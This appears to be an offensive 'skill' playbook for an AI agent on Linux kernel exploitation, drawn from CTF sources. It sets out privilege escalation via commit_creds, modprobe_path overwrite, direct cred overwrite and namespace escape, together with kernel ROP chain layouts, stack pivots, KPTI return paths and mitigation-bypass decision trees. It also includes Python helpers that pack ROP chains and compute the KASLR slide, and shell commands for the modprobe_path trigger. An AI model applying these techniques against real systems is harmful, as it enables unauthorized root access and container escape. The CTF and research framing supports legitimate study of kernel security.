kernel-exploitation

SKILL: Linux Kernel Exploitation — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert kernel exploitation techniques. Covers environment setup (QEMU), vulnerability classes, privilege escalation targets, kernel ROP, ret2usr, stack pivoting, and cross-cache attacks. Distilled from ctf-wiki kernel-mode sections and real-world kernel CVEs. Base models often confuse user-mode and kernel-mode exploitation constraints, especially regarding SMEP/SMAP/KPTI.

0. RELATED ROUTING

binary-protection-bypass — userspace protections (NX, ASLR) also apply in kernel context
stack-overflow-and-rop — kernel ROP reuses many userspace ROP concepts
heap-exploitation — kernel SLUB is conceptually related to userspace heap
linux-privilege-escalation — non-exploit kernel privesc techniques

Advanced References

KERNEL_MITIGATION_BYPASS.md — KASLR, SMEP, SMAP, KPTI, FG-KASLR, CFI bypass techniques
KERNEL_HEAP_TECHNIQUES.md — SLUB internals, cross-cache attacks, msg_msg/pipe_buffer/sk_buff exploitation

1. EXPLOITATION MODEL

┌─────────────────────────────────────────────────────────┐
│  1. Find Vulnerability                                  │
│     (UAF, OOB, race, integer overflow, type confusion)  │
├─────────────────────────────────────────────────────────┤
│  2. Build Primitive                                     │
│     (arbitrary read, arbitrary write, controlled RIP)   │
├─────────────────────────────────────────────────────────┤
│  3. Bypass Mitigations                                  │
│     (KASLR, SMEP, SMAP, KPTI)                           │
├─────────────────────────────────────────────────────────┤
│  4. Escalate Privileges                                 │
│     (commit_creds, modprobe_path, namespace escape)     │
├─────────────────────────────────────────────────────────┤
│  5. Return to Userspace Cleanly                         │
│     (KPTI trampoline, iretq/sysretq, swapgs)            │
└─────────────────────────────────────────────────────────┘

2. ENVIRONMENT SETUP

QEMU + Custom Kernel

bash

# Download and compile kernel
wget https://cdn.kernel.org/pub/linux/kernel/v6.x/linux-6.1.tar.xz
tar xf linux-6.1.tar.xz && cd linux-6.1
make defconfig

# Disable mitigations for easier debugging
scripts/config --disable RANDOMIZE_BASE      # KASLR
scripts/config --disable RANDOMIZE_LAYOUT    # FG-KASLR (out-of-tree; option name depends on the patch set)
scripts/config --enable DEBUG_INFO
# 5.18+ kernels select debug info through this choice instead
scripts/config --disable DEBUG_INFO_NONE
scripts/config --enable DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
make olddefconfig                            # re-resolve dependencies after editing .config
make -j$(nproc)

# Boot with QEMU (-s -S: GDB server on :1234, pause at start)
qemu-system-x86_64 \
    -kernel bzImage \
    -initrd rootfs.cpio.gz \
    -append "console=ttyS0 nokaslr quiet" \
    -nographic \
    -s -S \
    -monitor /dev/null \
    -m 256M \
    -cpu kvm64,+smep,+smap

GDB Debugging

bash

gdb vmlinux
target remote :1234

# Load kernel symbols
add-symbol-file vmlinux 0xffffffff81000000    # typical .text base

# Breakpoints
b commit_creds
b *0xffffffff81234567

# pwndbg/GEF work with kernel debugging

initramfs Modification

bash

mkdir rootfs && cd rootfs
zcat ../rootfs.cpio.gz | cpio -idmv    # the archive is gzip-compressed, so decompress before unpacking

# Edit init script, add exploit binary
cp /path/to/exploit ./

# Repack
find . | cpio -o --format=newc | gzip > ../rootfs.cpio.gz

3. COMMON VULNERABILITY TYPES

Type	Description	Kernel Example
UAF	Object freed but pointer still accessible	CVE-2019-2215 (Android Binder)
Uninitialized Memory	Field left uninitialized when an object is reused	CVE-2022-0847 (DirtyPipe)
OOB Read/Write	Array index or size check missing	CVE-2021-22555 (Netfilter)
Race Condition	TOCTOU between check and use	CVE-2016-5195 (DirtyCow)
Integer Overflow	Size calculation wraps around	Various ioctl handlers
Type Confusion	Object cast to wrong type	CVE-2021-34866 (eBPF)
Double Free	Object freed twice	SLUB allocator exploitation
Stack Overflow	Kernel stack buffer overflow	Rare (kernel stack is small: 8KB–16KB); e.g. CVE-2023-0179 (Netfilter)
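
The "size calculation wraps around" row is easiest to see with numbers. The sketch below models a 32-bit `count * elem_size` computation in Python; the function name and the sample values are illustrative assumptions, not taken from any particular driver.

```python
MASK32 = 0xFFFFFFFF  # models a 32-bit unsigned size variable


def alloc_size_u32(count: int, elem_size: int) -> int:
    """Return the size a 32-bit multiplication would produce (wraps mod 2**32)."""
    return (count * elem_size) & MASK32


count, elem_size = 0x40000001, 4
wrapped = alloc_size_u32(count, elem_size)

# The allocator sees the wrapped value, while a later copy loop that
# iterates `count` times touches the full, unwrapped byte range.
print(hex(wrapped))
print(hex(count * elem_size))
```

The gap between the two printed values is what turns an integer overflow into an out-of-bounds write.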

4. PRIVILEGE ESCALATION TARGETS

Method 1: commit_creds(prepare_kernel_cred(0))

// Kernel functions that install root credentials on the current process.
// COMMIT_CREDS_ADDR / PREPARE_KERNEL_CRED_ADDR: resolved kernel addresses.
int (*commit_creds)(void *) = (void *)COMMIT_CREDS_ADDR;
void *(*prepare_kernel_cred)(void *) = (void *)PREPARE_KERNEL_CRED_ADDR;
commit_creds(prepare_kernel_cred(0));  // cred with uid=0, gid=0
// Kernels >= 6.2: prepare_kernel_cred(NULL) returns NULL, so pass &init_cred to commit_creds instead.

Kernel ROP chain equivalent:

pop rdi; ret
0                          # NULL → prepare_kernel_cred(NULL) returns a root cred copied from init_cred
prepare_kernel_cred addr
mov rdi, rax; ... ; ret    # or pop rdi + known location
commit_creds addr
kpti_trampoline / swapgs+iretq  # return to userspace
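
As a layout illustration, the chain above can be packed into little-endian qwords. This is a minimal sketch: every offset in `OFFSETS` is a hypothetical placeholder (real values come from the target `vmlinux`), and `build_chain` is a name introduced here, not part of any library.

```python
import struct

# Hypothetical placeholder offsets from the kernel base; not real values.
OFFSETS = {
    "pop_rdi_ret": 0x1000,
    "prepare_kernel_cred": 0x2000,
    "mov_rdi_rax_ret": 0x3000,
    "commit_creds": 0x4000,
    "return_to_user": 0x5000,  # KPTI trampoline or swapgs+iretq gadget
}


def build_chain(kernel_base: int, off: dict, iret_frame: list) -> bytes:
    """Pack the chain in stack order, followed by the 5-qword return frame."""
    chain = [
        kernel_base + off["pop_rdi_ret"],
        0,  # rdi = NULL
        kernel_base + off["prepare_kernel_cred"],
        kernel_base + off["mov_rdi_rax_ret"],
        kernel_base + off["commit_creds"],
        kernel_base + off["return_to_user"],
        *iret_frame,  # [RIP, CS, RFLAGS, RSP, SS]
    ]
    return struct.pack(f"<{len(chain)}Q", *chain)


payload = build_chain(0xFFFFFFFF81000000, OFFSETS, [0, 0x33, 0, 0, 0x2B])
print(len(payload))  # number of bytes in the packed chain
```

Keeping offsets separate from the base means the same table can be reused once a KASLR leak supplies the real base.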

Method 2: modprobe_path Overwrite

// modprobe_path = "/sbin/modprobe" in kernel .data
// Overwrite to "/tmp/x" → trigger with unknown binary format → kernel runs /tmp/x as root

bash

# Setup:
echo '#!/bin/sh' > /tmp/x
echo 'cp /flag /tmp/flag && chmod 777 /tmp/flag' >> /tmp/x
chmod +x /tmp/x

# Trigger (unknown binary format):
echo -ne '\xff\xff\xff\xff' > /tmp/dummy
chmod +x /tmp/dummy
/tmp/dummy    # kernel calls modprobe_path → /tmp/x runs as root
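
When the write primitive stores one 8-byte value, the replacement path has to be expressed as a little-endian qword. A small sketch of that encoding, assuming a path short enough to fit with its NUL terminator (`path_to_qword` is a hypothetical helper name):

```python
def path_to_qword(path: bytes) -> int:
    """Encode a short NUL-terminated path as one little-endian 64-bit value."""
    if len(path) > 7:
        raise ValueError("path plus NUL terminator must fit in 8 bytes")
    return int.from_bytes(path.ljust(8, b"\x00"), "little")


value = path_to_qword(b"/tmp/x")
print(hex(value))
```

Longer paths would need several writes, one qword at a time, ending with a zero byte.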

Method 3: cred Structure Direct Overwrite

If you can find the current task's cred pointer and have an arbitrary write, zero the uid/gid fields (uid, gid, euid, egid and their saved/fs variants) in the cred structure directly.

Method 4: Namespace Escape (Containers)

Point the task's nsproxy at init_nsproxy, or otherwise manipulate namespace pointers, to escape container isolation.

5. KERNEL ROP

Controlled RIP Sources

Source	Mechanism
Corrupted function pointer	UAF object has vtable-like dispatch → overwrite pointer
Corrupted return address	Kernel stack overflow (rare)
Corrupted `ops` structure	Module operations struct (file_operations, seq_operations)

seq_operations Hijack (Common CTF Pattern)

struct seq_operations {
    void * (*start)(struct seq_file *, loff_t *);
    void (*stop)(struct seq_file *, void *);
    void * (*next)(struct seq_file *, void *, loff_t *);
    int (*show)(struct seq_file *, void *);
};
// Size: 0x20 (fits in kmalloc-32)
// Open /proc/self/stat → allocates seq_operations
// UAF overwrite start → controlled RIP when read() is called
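
The "fits in kmalloc-32" comment follows from rounding the struct size up to the nearest general-purpose slab size. The sketch below assumes the usual x86-64 size classes; the list and the helper name are assumptions for illustration, and newer kernels may place accounted allocations in separate `kmalloc-cg-*` caches of the same sizes.

```python
import bisect

# Assumed general-purpose kmalloc size classes on x86-64.
KMALLOC_SIZES = [8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192]


def kmalloc_size_class(size: int) -> int:
    """Return the smallest size class that can hold `size` bytes."""
    if size <= 0 or size > KMALLOC_SIZES[-1]:
        raise ValueError("size outside the modelled kmalloc range")
    return KMALLOC_SIZES[bisect.bisect_left(KMALLOC_SIZES, size)]


seq_operations_size = 4 * 8  # four function pointers on a 64-bit kernel
print(kmalloc_size_class(seq_operations_size))
```

The same lookup tells you which victim objects share a cache with the vulnerable one.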

Stack Pivoting in Kernel

Gadget	Usage
`xchg eax, esp; ret`	Pivot to address in lower 32 bits of RAX (mmap buffer at known addr)
`mov rsp, [rdi+X]; ...`	If RDI points to controlled data
`push rdi; pop rsp; ...`	Pivot to RDI (first arg of hijacked function)

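Important: With SMEP enabled, the kernel cannot execute userspace code, so the ROP chain must use kernel gadgets only. With SMAP also enabled, the pivot target itself must live in kernel memory, because a userspace mmap buffer can no longer be read as a stack.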
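
For the `xchg eax, esp` row, the new stack pointer is the zero-extended low 32 bits of RAX, so the buffer to map can be computed ahead of time. A minimal sketch of that arithmetic follows; the RAX value is a hypothetical placeholder and `pivot_plan` is a name introduced here. It only applies when SMAP is off.

```python
PAGE_SIZE = 0x1000


def pivot_plan(rax: int) -> tuple:
    """Return (new_rsp, page_base) after `xchg eax, esp` with the given RAX."""
    new_rsp = rax & 0xFFFFFFFF             # 32-bit xchg zero-extends into RSP
    page_base = new_rsp & ~(PAGE_SIZE - 1)  # page that must be mapped in userspace
    return new_rsp, page_base


# Hypothetical RAX value at the moment of the hijacked call.
new_rsp, page_base = pivot_plan(0xFFFFFFFF8123A5C8)
print(hex(new_rsp), hex(page_base))
```

In practice the mapping usually spans a few pages around `page_base`, since called functions push below the pivoted stack pointer.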

6. ret2usr (Pre-SMEP)

Directly call a userspace function from kernel context:

void escalate() {
    commit_creds(prepare_kernel_cred(0));
}
// Overwrite kernel function pointer to point to escalate() in user memory

Blocked by: SMEP (Supervisor Mode Execution Prevention) — kernel cannot execute user-mapped pages.

7. RETURNING TO USERSPACE

After escalating privileges in the kernel, the exploit must return cleanly to userspace to get a root shell.

Via iretq (Traditional)

nasm

; ROP chain ending:
swapgs                     ; swap GS base back to userspace
iretq                      ; pops: RIP, CS, RFLAGS, RSP, SS from stack
; Stack must contain: [user_rip][user_cs][user_rflags][user_rsp][user_ss]
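
The frame order that `iretq` expects can be made concrete by packing it. This is a sketch under stated assumptions: the RIP, RFLAGS and RSP values are placeholders standing in for state saved at runtime, and `iretq_frame` is a hypothetical helper name.

```python
import struct


def iretq_frame(rip: int, cs: int, rflags: int, rsp: int, ss: int) -> bytes:
    """Pack the five qwords in the order iretq pops them (lowest address first)."""
    return struct.pack("<5Q", rip, cs, rflags, rsp, ss)


# Placeholder values; real ones are captured from the running process.
frame = iretq_frame(
    rip=0x401000,         # e.g. address of a post-exploit function
    cs=0x33,              # 64-bit user code segment
    rflags=0x246,
    rsp=0x7FFD00001000,
    ss=0x2B,              # user stack segment
)
print(len(frame))  # frame size in bytes
```

The frame is appended directly after the last gadget address in the chain.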

python

# Save userspace state before entering kernel
user_cs = 0x33
user_ss = 0x2b
user_rflags = None  # saved via pushfq before exploit
user_rsp = None     # saved RSP
user_rip = None     # address of post-exploit function (e.g., get_shell)

Via KPTI Trampoline (When KPTI Enabled)

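KPTI separates kernel and user page tables. A bare swapgs; iretq returns to user mode while CR3 still points at the kernel page tables, where userspace pages are mapped non-executable, so the first user instruction faults. Use the kernel's own return trampoline, which switches CR3 before returning: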

; KPTI trampoline (in kernel at known offset):
swapgs_restore_regs_and_return_to_usermode:
    mov rdi, rsp
    ...
    swapgs
    iretq
; Jump to trampoline with [RIP, CS, RFLAGS, RSP, SS] on stack

Via signal Handler Return

Set up a signal handler before the exploit. After commit_creds, trigger the signal; the kernel then returns to userspace through the handler along its normal signal-delivery path (avoids a manual swapgs/iretq).

8. QEMU DEBUGGING TIPS

Command	Purpose
`-s -S`	GDB server on :1234, paused
`-monitor /dev/null`	Disable QEMU monitor (cleaner output)
`-append "nokaslr"`	Disable KASLR for debugging
`-cpu kvm64,+smep,+smap`	Enable specific CPU features
`info registers` (GDB)	Show all register values
`maintenance packet Qqemu.PhyMemMode:1`	Read physical memory in GDB
`cat /proc/kallsyms`	Kernel symbol addresses (if readable)
`cat /sys/kernel/notes`	Kernel build ID
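
For the `/proc/kallsyms` row, a small parser turns the listing into a lookup table and shows whether addresses are hidden. This is a sketch: `parse_kallsyms` and `symbols_hidden` are hypothetical helper names, and the sample addresses are made up for illustration.

```python
def parse_kallsyms(text: str) -> dict:
    """Map symbol name -> address from kallsyms-style 'addr type name [module]' lines."""
    symbols = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        symbols.setdefault(parts[2], int(parts[0], 16))  # keep first occurrence
    return symbols


def symbols_hidden(symbols: dict) -> bool:
    """True when every address is zero, as shown to unprivileged readers."""
    return bool(symbols) and all(addr == 0 for addr in symbols.values())


SAMPLE = """\
ffffffff810c3d50 T commit_creds
ffffffff810c4010 T prepare_kernel_cred
ffffffffc0201000 t helper_fn\t[demo_mod]
"""
table = parse_kallsyms(SAMPLE)
print(hex(table["commit_creds"]), symbols_hidden(table))
```

On a live system the input would come from reading `/proc/kallsyms`; all-zero addresses mean the "if readable" condition does not hold.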

9. DECISION TREE

Kernel vulnerability identified
├── What type?
│   ├── UAF → identify freed object, spray replacement (see KERNEL_HEAP_TECHNIQUES)
│   ├── OOB → determine read/write range, target adjacent objects
│   ├── Race condition → reliable trigger (userfaultfd, FUSE)
│   ├── Integer overflow → how does it translate to OOB or allocation confusion?
│   └── Type confusion → what can the confused type access?
│
├── Build primitive
│   ├── Controlled RIP? → kernel ROP or ret2usr (if no SMEP)
│   ├── Arbitrary read? → leak KASLR base, then controlled RIP
│   ├── Arbitrary write? → modprobe_path overwrite (simplest)
│   │                      or overwrite cred structure directly
│   └── Limited write? → target function pointer in known object
│
├── Mitigations (see KERNEL_MITIGATION_BYPASS.md)
│   ├── KASLR → need info leak first (/proc/kallsyms if readable, timing, or OOB read)
│   ├── SMEP → kernel ROP only (no user code exec)
│   ├── SMAP → cannot read user data from kernel (use copy_from_user gadget)
│   ├── KPTI → use KPTI trampoline for clean return
│   └── FG-KASLR → function offsets randomized (use data section targets like modprobe_path)
│
├── Escalation method
│   ├── Have controlled RIP + KASLR bypass → ROP chain: prepare_kernel_cred(0) → commit_creds
│   ├── Have arbitrary write only → modprobe_path overwrite
│   ├── Have arbitrary write + KASLR bypass → overwrite cred uid/gid to 0
│   └── Have controlled function call → call commit_creds(prepare_kernel_cred(0))
│
└── Return to userspace
    ├── KPTI disabled → swapgs; iretq (ROP ending)
    ├── KPTI enabled → jump to KPTI trampoline
    └── Alternative → signal handler + process_one_work return path
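
The KASLR branch of the tree reduces to one subtraction once a single kernel pointer has leaked. The sketch below assumes the default x86-64 text base and 2 MiB alignment; the symbol addresses are hypothetical placeholders and the helper names are introduced here for illustration.

```python
KERNEL_TEXT_DEFAULT = 0xFFFFFFFF81000000  # assumed nokaslr text base on x86-64
KASLR_ALIGN = 0x200000                    # assumed 2 MiB randomization granularity


def kaslr_slide(leaked_addr: int, static_addr: int) -> int:
    """Slide = runtime address minus the address of the same symbol in vmlinux."""
    slide = leaked_addr - static_addr
    if slide < 0 or slide % KASLR_ALIGN:
        raise ValueError("leak does not match the assumed symbol or alignment")
    return slide


def rebase(static_addr: int, slide: int) -> int:
    """Runtime address of any other symbol, given its vmlinux address."""
    return static_addr + slide


# Hypothetical values: one leaked pointer and two addresses read from vmlinux.
slide = kaslr_slide(leaked_addr=0xFFFFFFFF9A2C0000, static_addr=0xFFFFFFFF810C0000)
print(hex(KERNEL_TEXT_DEFAULT + slide))          # runtime kernel base
print(hex(rebase(0xFFFFFFFF82E8B3A0, slide)))    # e.g. a data-section target
```

The alignment check is a cheap sanity test that the leaked value really is the symbol it was assumed to be.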
